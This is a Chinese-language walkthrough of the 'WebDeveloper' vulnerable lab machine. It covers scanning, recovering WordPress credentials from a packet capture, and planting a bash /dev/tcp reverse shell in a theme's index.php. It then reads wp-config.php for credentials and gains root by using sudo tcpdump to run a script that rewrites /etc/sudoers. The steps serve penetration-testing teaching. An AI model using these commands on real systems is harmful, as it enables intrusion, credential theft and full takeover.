WebDeveloper靶机:从Web渗透到Root提权

admin
admin
admin
139887
文章
114
评论
2025年3月10日23:07:58评论12 views字数 1933阅读6分26秒阅读模式

WebDeveloper

信息收集:发现目标

发现主机

使用 nmap 扫描局域网内活跃主机:

nmap -sP 192.168.20.0/24

发现目标IP:192.168.20.106

WebDeveloper靶机:从Web渗透到Root提权

端口与服务探测

进一步扫描目标开放的端口及服务版本:

nmap -sV -p- 192.168.20.106

发现服务:

  • 22/tcp:OpenSSH 7.6p1

  • 80/tcp:Apache httpd 2.4.29

WebDeveloper靶机:从Web渗透到Root提权

Web渗透:突破WordPress

访问Web服务

打开 http://192.168.20.106,发现网站基于 WordPress 框架。

WebDeveloper靶机:从Web渗透到Root提权
WebDeveloper靶机:从Web渗透到Root提权

枚举目录

使用 dirb扫描隐藏目录:

dirb http://192.168.20.106/

发现目录:

http://192.168.20.106/ipdata/
http://192.168.20.106/wp-admin/
http://192.168.20.106/wp-content/
http://192.168.20.106/wp-includes/
WebDeveloper靶机:从Web渗透到Root提权

访问/ipdata/目录

发现文件:

  • /ipdata/analyze.cap(流量文件)
WebDeveloper靶机:从Web渗透到Root提权

流量分析

下载 analyze.cap 并分析,发现一条HTTP登录请求: 发现登录行为:

180 90.210143 192.168.1.222 192.168.1.176 HTTP 799 POST /wordpress/wp-login.php HTTP/1.1 (application/x-www-form-urlencoded)
追踪HTTP流:
POST /wordpress/wp-login.php  
用户名:webdeveloper  
密码(URL解码后):Te5eQg&4sBS!Yr$wf%(DcAd
WebDeveloper靶机:从Web渗透到Root提权
WebDeveloper靶机:从Web渗透到Root提权
WebDeveloper靶机:从Web渗透到Root提权

登录WordPress后台

http://192.168.20.106/wp-login.php
用户:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd
发现上传点:
http://192.168.20.106/wp-admin/upload.php
http://192.168.20.106/wp-admin/theme-install.php?browse=featured
WebDeveloper靶机:从Web渗透到Root提权

反弹Shell:获取系统权限

植入恶意代码

点击"Appearance">"Editor">在"Select theme to edit"选择"Twenty Fifteen">点击"Select">在"Theme Files"找到"index.php"编辑

通过编辑主题文件 Twenty Fifteen 的 index.php,插入反弹Shell代码:

system("bash -c 'sh -i &>/dev/tcp/192.168.20.100/8888 0>&1'");

更新文件:"Update File"

点击"Appearance">"Themes">选择"Twenty Fifteen">点击"Activate"

WebDeveloper靶机:从Web渗透到Root提权
WebDeveloper靶机:从Web渗透到Root提权

监听端口

nc -nlvvp 8888

触发shell

访问http://192.168.20.106/index.php

反弹成功

WebDeveloper靶机:从Web渗透到Root提权

提权

查找敏感配置

find /var/www/html -name "*config*" 2>/dev/null

在网站根目录发现 wp-config.php

网站根目录配置:

/var/www/html/wp-config.php
WebDeveloper靶机:从Web渗透到Root提权

泄露数据库凭据

cat /var/www/html/wp-config.php

用户:webdeveloper

密码:MasterOfTheUniverse

WebDeveloper靶机:从Web渗透到Root提权

ssh登录

ssh [email protected]

登录成功

WebDeveloper靶机:从Web渗透到Root提权

利用sudo漏洞提权

sudo -l

发现可执行 tcpdump 命令。

(root) /usr/sbin/tcpdump

WebDeveloper靶机:从Web渗透到Root提权

编写payload

vi /tmp/exp

#! /bin/bash
  chmod 777 /etc/sudoers && echo"webdeveloper ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers

chmod 777 /tmp/exp
WebDeveloper靶机:从Web渗透到Root提权

执行tcpdump命令

通过 tcpdump 触发脚本:

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
WebDeveloper靶机:从Web渗透到Root提权

查看sudo特权

sudo -l
  • (root) /usr/sbin/tcpdump
  • (root) NOPASSWD: ALL
sudo su
id
  • uid=0(root) gid=0(root) groups=0(root)
WebDeveloper靶机:从Web渗透到Root提权

红队全栈教学

可在公众号回复“红队”获取群链接

原文始发于微信公众号(泷羽Sec-Ceo):WebDeveloper靶机:从Web渗透到Root提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月10日23:07:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WebDeveloper靶机:从Web渗透到Root提权http://cn-sec.com/archives/3818812.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息